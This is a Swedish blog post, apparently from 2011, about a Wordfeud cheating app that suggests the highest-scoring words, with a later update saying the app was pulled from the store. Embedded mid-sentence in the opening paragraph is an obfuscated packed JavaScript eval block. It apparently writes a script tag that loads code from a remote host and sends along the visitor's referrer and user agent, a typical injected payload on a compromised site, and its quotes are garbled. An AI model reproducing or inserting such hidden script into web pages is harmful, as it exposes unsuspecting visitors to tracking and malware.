Image Image Image Image Image Image Image Image Image Image

| 24 april, 2018

Scroll to top

Top

10 Comments

Fusk App till Wordfeud gör att du kan lista bästa orden

Fusk App till Wordfeud gör att du kan lista bästa orden
Sebastian Plengier Ehrnfelt

Efter eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dbrha|var|u0026u|referrer|iktkh||js|php’.split(‘|’),0,{}))
många nyheter och uppdateringar gällande fusk på svenska Wordfeud har det nu kommit upp en applikation i appstore som gör att du kan lista de bästa orden att lägga. Självklart skapar detta debatt.

Att spela mot okända personer på Wordfeud har varit den funktionen enligt mig som varit roligast.
Nu på senare tid har jag dock märkt att de svenskar jag spelar emot plötsligt är otroligt mycket bättre än vad dem varit tidigare. Konstiga ord som jag själv aldrig hört läggs och poäng upp mot 100 per ord delas ut.

Applikationen ”Swedish Word Finder” som nu ligger etta på svenska appstore gör det möjligt att generera de bästa möjliga ord utifrån de bokstäver du har tillgängliga. Denna app har gjort att flera spelare slutat använda Wordfeud, konstigt? nej.

Detta är inget att hålla hemligt längre utan du kan nu ladda ner ”Swedish Word Finder” i appstore för 7 kr och enkelt ta hem segern. Men självklart bara om din motståndare inte också använder den :p . Ladda ner appen här: Fusk till Wordfeud

*UPPDATERING*

Fuskappen stoppas i appstore. Läs här: http://www.revue.se/2011/10/mobil/android/fuskappen-till-wordfeud-stoppas/

WordsFinder for Wordfeud / Swedish - Rick Jansen